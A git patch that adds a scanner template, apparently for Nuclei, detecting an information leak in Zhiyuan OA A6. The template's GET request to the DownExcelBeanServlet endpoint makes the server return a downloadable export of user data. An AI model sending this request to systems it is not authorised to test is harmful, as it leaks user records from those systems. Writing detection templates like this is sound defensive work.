From 2f39160e65d1b5b2a5dfac1988dd5f3452c666f8 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Wed, 24 Feb 2021 08:07:57 +0000
Subject: [PATCH] Create zhiyuan-oa-info-leak.yaml

---
 .../other/zhiyuan-oa-info-leak.yaml           | 26 +++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 vulnerabilities/other/zhiyuan-oa-info-leak.yaml

diff --git a/vulnerabilities/other/zhiyuan-oa-info-leak.yaml b/vulnerabilities/other/zhiyuan-oa-info-leak.yaml
new file mode 100644
index 0000000000..0bc1470302
--- /dev/null
+++ b/vulnerabilities/other/zhiyuan-oa-info-leak.yaml
@@ -0,0 +1,26 @@
+id: zhiyuan-oa-info-leak
+
+info:
+  name: Zhiyuan Oa A6-s info Leak
+  author: pikpikcu
+  severity: info
+  reference: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
+  tags: zhiyuan,leak,disclosure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Content-disposition: attachment;filename="
+          - "Content-Type: application/x-msdownload"
+        part: header
+
+      - type: status
+        status:
+          - 200